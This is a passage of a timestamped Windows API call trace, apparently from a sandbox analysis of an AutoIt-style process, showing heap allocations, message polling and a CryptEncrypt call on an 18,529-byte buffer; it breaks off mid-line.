[0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.626] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.627] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0030.627] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.628] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.631] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.631] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.631] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.631] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.631] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.631] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.631] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.632] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.632] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.632] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.632] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.632] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.632] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.632] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.632] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.632] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.633] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x4857, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x4860) returned 1 [0030.633] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.633] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.633] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.633] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.633] CharLowerBuffW (in: lpsz="byte[18529]", cchLength=0xb | out: lpsz="byte[18529]") returned 0xb [0030.633] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.633] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.633] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.634] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a9078*, pdwDataLen=0x6ae220*=0x4857, dwBufLen=0x4860 | out: pbData=0x8a9078*, pdwDataLen=0x6ae220*=0x4860) returned 1 [0030.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 